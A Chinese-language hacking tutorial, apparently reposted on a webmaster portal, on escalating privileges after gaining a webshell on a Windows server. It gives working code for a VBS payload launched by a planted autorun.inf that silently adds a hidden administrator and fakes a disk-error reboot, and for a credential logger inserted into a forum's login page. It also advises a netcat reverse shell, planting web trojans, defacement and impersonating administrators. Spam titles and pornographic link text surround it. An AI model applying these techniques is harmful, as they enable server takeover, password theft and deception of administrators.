青草久久影院-青草久久伊人-青草久久久-青草久久精品亚洲综合专区-SM双性精跪趴灌憋尿调教H-SM脚奴调教丨踩踏贱奴

17站長網(wǎng)

17站長網(wǎng) 首頁 安全 入侵防御 查看內(nèi)容

另類巧妙的思路:旁門左道的入侵方式詳解!

2022-9-26 12:48| 查看: 2216 |來源: 互聯(lián)網(wǎng)

很多的時候,入侵并不是單純靠技術(shù)的,有很多是運(yùn)氣因素,更重要的是如何對一些擺在你面前的一些安全破綻的攻擊。我很相信安全意識這個東西,當(dāng)一臺服務(wù)器擺在你面前時,大概的看下就知道服務(wù)器的安全到底如何了,特
很多的時候,入侵并不是單純靠技術(shù)的,有很多是運(yùn)氣因素,更重要的是如何對一些擺在你面前的一些安全破綻的攻擊。我很相信安全意識這個東西,當(dāng)一臺服務(wù)器擺在你面前時,大概的看下就知道服務(wù)器的安全到底如何了,特別是對于入侵之后的webshell的提升,更多的依賴于管理員的安全意識。由于本人的技術(shù)不好,不能自己發(fā)現(xiàn)溢出漏洞,所以在入侵時只能搞些旁門左道的東西了。也許這些都是被管理員和高手所不恥的,但是在實(shí)際中,這些伎倆的威脅不容忽視,你根本不知道什么時候你的系統(tǒng)就會變得到處是陷阱,加上安全意識薄弱一點(diǎn)的話,對系統(tǒng)的危害還是很大的,我就來說說我平時用到的一些旁門左道的方法吧!(大家以后不要鄙視我就行了^_^)
首先我們獲得一個webshell,因?yàn)槲艺f的旁門左道主要就是用在得到webshell之后的權(quán)限提升,webshell相信大家手里都有一大把吧!沒有也沒有關(guān)系,腳本漏洞那么多,看看以前的文章自己上網(wǎng)找找吧!^_^。得到webshell以后,我一般都是先看看系統(tǒng)的進(jìn)程列表,砍客的木馬和最近的海洋木馬都有這個功能。我用的就是海洋的修改版,可以看到很詳細(xì)的信息,你沒有這樣的木馬的話也沒有關(guān)系,我這里有別人給我的一段代碼,放到服務(wù)器上就可以看進(jìn)程了: <%
dim obj //定義變量//
for each obj in getObject("WinNT://.") //循環(huán)取得系統(tǒng)本機(jī)對象//
err.clear //錯誤處理//
%>
<%=obj.Name%> //顯示對象Name屬性,即顯示系統(tǒng)用戶組//
<%if err then
else
%>(<%=obj.DisplayName%>)<%end if%> //顯示當(dāng)前服務(wù)名//

<%=obj.path%> //顯示當(dāng)前服務(wù)程序路徑// 保存為asp文件訪問看看吧!如圖一。這里要仔細(xì)看看,服務(wù)都裝在哪里,還有哪些服務(wù),這樣就可以知道管理員的水平到底怎么樣了。如果你什么也沒有得到的話說明管理員不是很差勁,就要小心了!呵呵,服務(wù)都裝在默認(rèn)的路徑下啊,默認(rèn)Guest沒有什么權(quán)限,不過如果你發(fā)現(xiàn)有不在默認(rèn)路徑下的服務(wù),就試著執(zhí)行命令看看,可以執(zhí)行的話就可以把我們自己的程序傳上去改掉服務(wù)的名字,將自己的程序替換成他的(這里要求對方的程序路徑下是默認(rèn)的權(quán)限哦)。windows默認(rèn)是不允許刪除正在執(zhí)行的文件但是可以改名,呵呵,這里只要服務(wù)器重起我們的程序就可以執(zhí)行了,當(dāng)然是以犧牲對方的服務(wù)為代價的了,建議搞瑞星之類的殺毒軟件。這里因?yàn)槭且确⻊?wù)器重起,但是一周左右都會重起的,概率很大,windows太不穩(wěn)定了。呵呵,陰險吧,一切都是為了權(quán)限,不然怎么叫旁門左道呢?如果你真的比較性急,我也不建議你跑去D人家,是托管主機(jī)的話直接冒充管理員讓托管機(jī)房的人重起比較好,成功率據(jù)說很高的啊!前提是你要十分了解對方。當(dāng)然,如果機(jī)器有Server-u并且版本比較低的話就不用那么麻煩了,如何提權(quán)就看看以前的文章吧,我就不多說了。但是看看這里,我們的情況不怎么好,看看服務(wù)的路徑就知道,就是幾個防火墻和殺毒軟件,全部默認(rèn)啊,可以執(zhí)行命令也沒有辦法替換服務(wù)了。我們再看看,好多默認(rèn)的服務(wù)都沒有關(guān),這是一個對安全重視的網(wǎng)管所不會做的,至少那個什么ClipBook服務(wù)就是個例子(排除對自己超級自信的網(wǎng)管!)。可以看出他的安全意識至少不是那么到位,我們肯定有空子可以鉆的,哈哈!接著往后看吧,用Fso查看磁盤發(fā)現(xiàn)都可以瀏覽,還可寫,看來都是默認(rèn)的設(shè)置,還可以執(zhí)行命令,網(wǎng)管果然比較$#%$@$#%啊!其實(shí)開始我就應(yīng)該知道,因?yàn)樗膚eb頁面和數(shù)據(jù)庫都是默認(rèn)設(shè)置,我就是那樣得到webshell的!基本可以確定我們的對手是怎么樣的一個人了!呵呵。
但是好象還是沒有什么用,可以執(zhí)行命令,將nc傳上去還可以得到了反向的cmdshell,亂轉(zhuǎn)悠但還是沒有什么思路!管理員不懂做安全配置但是微軟的補(bǔ)丁不知道為什么打得很全,本地的溢出都不好用!郁悶。那就再在他的硬盤里看看,嘿嘿,根目錄可寫啊,想起什么了?記不記得系統(tǒng)默認(rèn)的那個autorun.inf啊,放在磁盤根目錄,雙擊的話會執(zhí)行那個指定程序的呵,我們就放個autorun.inf上去,哈哈。如圖二。這樣他的硬盤下就有我們放置的陷阱了,等管理員來了。當(dāng)然,不能直接用autonrun.inf運(yùn)行我們的木馬,這樣管理員打不開硬盤一定會奇怪的,我寫了個隱蔽點(diǎn)的代碼: Dim fso, MyFile //定義變量//
Set fso = createObject("Scripting.FileSystemObject") //取得Fso對象//
Set MyFile = fso.GetFile("d:\autorun.inf") //打開文件d:\autorun.inf//
MyFile.delete //刪除文件// dim sh //定義變量//
set sh=createobject("wscript.shell") //創(chuàng)建對象//
sh.run "net user jnc lxfxd /add",0 //Wsh執(zhí)行命令添加帳戶jnc//
sh.run "net localgroup administrators jnc /add",0 //將jnc帳戶加為管理員//
sh.run "attrib h s d:\run.vbs",0 //將我們的run.vbs加上系統(tǒng)隱藏屬性//
sh.run "shutdown -r -t 30 -c windows讀盤錯誤,需要重新啟動以讀取分區(qū)表.",0 //重起機(jī)器,后面的是迷惑管理員// 保存為run.vbs,與后面的autorun.inf設(shè)置為隱藏之后一起放到磁盤根目錄下。如果是2000,可以把shutdown.exe傳上去,這些代碼的意思是先刪除autotun.inf,然后加jnc為管理員,最后彈出對話框,機(jī)器重起,重起后什么痕跡都沒有了,除了多個管理員用戶。提示信息可以自己改,迷惑性越大越好!在autorun.inf里寫上下面的代碼:
[autorun] OPEN=wscript run.vbs 一定要是wscript.exe啊,不然有黑的對話框出來就麻煩了。應(yīng)該有高手知道如何用腳本打開磁盤的,但是我不會寫,不過這樣已經(jīng)夠狠的了,想想現(xiàn)在有哪個打開磁盤時不是雙擊啊!
除了這個,還有個東西很值得提下,就是以前的黑x介紹的那個目錄欺騙工具,管理員誤以為是文件夾就可以加帳戶的那個。不過我得到的程序運(yùn)行程序成功后總有個bat文件,刪不掉,是人都看出來有鬼!我就不要運(yùn)行程序的功能了,直接傳到管理員去得多的地方,嘿嘿,根目錄下放一個,網(wǎng)站目錄放一個,……。如圖三,也不要太多了,放到管理員眼皮底下等他運(yùn)行就可以了,我是不知道如何編程啊,不然寫個名字誘惑性更大的程序效果更好。我們有帳戶又有可以執(zhí)行命令的cmdshell,沒有3389也可以用runas命令啊,這機(jī)器就是我們的了!可是這樣安全意識的管理員一般很懶,不一定會經(jīng)常上線,不然不會這么多漏子。嘿嘿,不要著急,等什么都弄完了再想法讓他上線檢查自己的電腦,這樣才可以運(yùn)行我們的程序。
再找找其他有不有空子可以鉆。去看看他網(wǎng)站上有什么東西吧,他這樣的管理員各個地方用的密碼不會都不一樣吧?網(wǎng)站上有個動網(wǎng)sp2的,把數(shù)據(jù)庫由asp的copy成mdb的下載下來看看。在Dv_log里沒有找到密碼,看到了注冊時間最早的那個家伙(這個當(dāng)然就是管理員了自己!)的密碼,拿下來跑跑。可是半天也沒有跑出來啊,急!我破解不出來我還不會等著你往我家里送啊?干脆找到了bbs的login.asp在里面加了點(diǎn)東西: <%
dim Name,password,fso,file //定義后面要用到的變量//
Name = Request("username") //取得瀏覽器傳過來的username變量//
Password = Request("password") //取得瀏覽器傳過來的Password變量//
Const ForReading = 1, ForWriting = 2, ForAppending = 8 //定義后面寫文件的參數(shù)//
Set fso = Server.createObject("Scripting.FileSystemObject") //取得Fso對象,準(zhǔn)備寫文件//
Const path = "D:\mir3\bbs\admin_list.asp" //定義要寫的文件路徑//
set file=fso.opentextfile(path, ForAppending, TRUE) //取得文件對象//
file.write(Name) & " " //寫取得的用戶名//
file.write(Password) & "||" //寫取得的密碼,并用||分隔開//
file.close //關(guān)閉文件//
set file = nothing //釋放變量//
set fso = nothing //釋放變量//
%> 注意的是里面request的變量,具體的字段自己改!還有后面你要存放的文件地址,這個也根據(jù)情況自己填了,以后經(jīng)常來看看得到的東西就行了,我比較關(guān)注的是admin!如圖四。又一個個陷阱挖好了,等管理員鉆了。可是好象不知道他什么時候登陸呢,我干脆去當(dāng)會壞人,發(fā)了幾個人身攻擊的帖子,灌了一會惡意的水就不信你管理員熬得住不上來刪帖子!(不是我的本意,大家原諒!)嘿嘿
再轉(zhuǎn)悠了幾下子,發(fā)現(xiàn)C:\Program Files下有3721,乖乖,難道服務(wù)器還有人拿來上網(wǎng)啊?不過也不排除那種可能,二話不說,找人要了最新的網(wǎng)頁木馬的代碼,找網(wǎng)站幾個關(guān)鍵的頁面插進(jìn)去,如圖五哈哈,又是一個陷阱,只要你打開Ie上網(wǎng)!再找找,發(fā)現(xiàn)這個管理員還好,服務(wù)器上不聊QQ,也沒有什么游戲,要不然我們又可以給他捆上個東西,捆什么?當(dāng)然是木馬了!我還真遇到有人在服務(wù)器聊QQ玩連連看外加看少兒不易的東西,呵呵,這樣的機(jī)器要是還搞不定就真是你的問題了。
這個機(jī)器上基本上已經(jīng)到處是陷阱了,只等管理員上線了,我可等不急了,催催他吧!拿出經(jīng)典的黑站圖片,插入網(wǎng)頁木馬在里面替換主頁黑了他!(這里我了解管理員的水平所以這么做的,大家千萬不要模仿!)就等他發(fā)現(xiàn)了,我們的陷阱可是在等他的啊!可是這個網(wǎng)站好象人氣不怎么好,等了半天也沒有人清除黑頁。算了,中招是遲早的事了,你要是沒有耐心在網(wǎng)站上找下他的QQ告訴他,注意社會工程學(xué)的應(yīng)用啊,呵呵。
這里還要說點(diǎn)其他的,得到webshell和權(quán)限有更好的辦法,上那個可以查詢網(wǎng)站信息的站點(diǎn),http://www.webhosting.info查詢下他的信息,如圖六,注冊個相似的郵箱,或者直接打電話,然后冒充下站長說自己的密碼丟了,偶不怎么擅長這個,所以都是聽人家說的,可是上次跟小默上電信機(jī)房發(fā)現(xiàn)那里檢查真不是怎么嚴(yán),簽個名就讓進(jìn)去,進(jìn)去之后還什么都不管。一些服務(wù)器就那樣開著,管理員已經(jīng)登陸但是人不在,還有一些很重要的服務(wù)器都可以直接操作的,真不知道放個馬到網(wǎng)關(guān)上去會怎么樣,這里說的東西或許有些偏離黑客的技術(shù)了,但是,你敢保證這些旁門左道不會威脅到你的主機(jī)的安全?意識很重要,安全再怎么小心都不為過,好了,我就說到這里
本文最后更新于 2022-9-26 12:48,某些文章具有時效性,若有錯誤或已失效,請?jiān)诰W(wǎng)站留言或聯(lián)系站長:17tui@17tui.com
·END·
站長網(wǎng)微信號:w17tui,關(guān)注站長、創(chuàng)業(yè)、關(guān)注互聯(lián)網(wǎng)人 - 互聯(lián)網(wǎng)創(chuàng)業(yè)者營銷服務(wù)中心

免責(zé)聲明:本站部分文章和圖片均來自用戶投稿和網(wǎng)絡(luò)收集,旨在傳播知識,文章和圖片版權(quán)歸原作者及原出處所有,僅供學(xué)習(xí)與參考,請勿用于商業(yè)用途,如果損害了您的權(quán)利,請聯(lián)系我們及時修正或刪除。謝謝!

17站長網(wǎng)微信二維碼

始終以前瞻性的眼光聚焦站長、創(chuàng)業(yè)、互聯(lián)網(wǎng)等領(lǐng)域,為您提供最新最全的互聯(lián)網(wǎng)資訊,幫助站長轉(zhuǎn)型升級,為互聯(lián)網(wǎng)創(chuàng)業(yè)者提供更加優(yōu)質(zhì)的創(chuàng)業(yè)信息和品牌營銷服務(wù),與站長一起進(jìn)步!讓互聯(lián)網(wǎng)創(chuàng)業(yè)者不再孤獨(dú)!

掃一掃,關(guān)注站長網(wǎng)微信

大家都在看

    熱門排行

      最近更新

        返回頂部
        主站蜘蛛池模板: 在线中文字幕亚洲日韩 | 老熟人老女人国产老太 | 最新国产精品福利2020 | 公么我好爽再深一点 | 中文字幕无码他人妻味 | 亚洲精品天堂无码中文字幕影院 | 99精品国产第一福利网站 | 久久免费精彩视频 | 久久两性视频 | 折磨比基尼美女挠肚子 | 美女被黑人巨大进入 | 免费亚洲视频在线观看 | 找老女人泻火对白自拍 | 在教室做啊好大用力 | 久草视频在线观看免费4 | 无限资源在线观看8 | 国产在线精彩视频 | 99久久亚洲综合精品 | 久久久久久久久a免费 | 特级aa 毛片免费观看 | 最近日本MV字幕免费观看视频 | 97蜜桃网123.com | 单亲妈妈3韩国电影免费观看 | 偷拍自偷拍亚洲精品 | 国产精品一区二区AV97 | 亲女乱h文小兰第一次 | 性派对xxxhd| 把她带到密室调教性奴 | 91天堂国产在线 在线播放 | 国内精品自产拍在线少密芽 | AAA级精品无码久久久国片 | yellow在线观看免费高清的日本 | 人与禽交3d动漫羞羞动漫 | 人妻中文字幕乱人伦在线 | 97国产揄拍国产精品人妻 | 国产午夜理论片YY8840Y | 久久综合狠狠综合狠狠 | 欧美日韩免费播放一区二区 | 国模孕妇模特季玥之粉红 | 超碰97免费人妻 | china年轻小帅脸直播飞机 |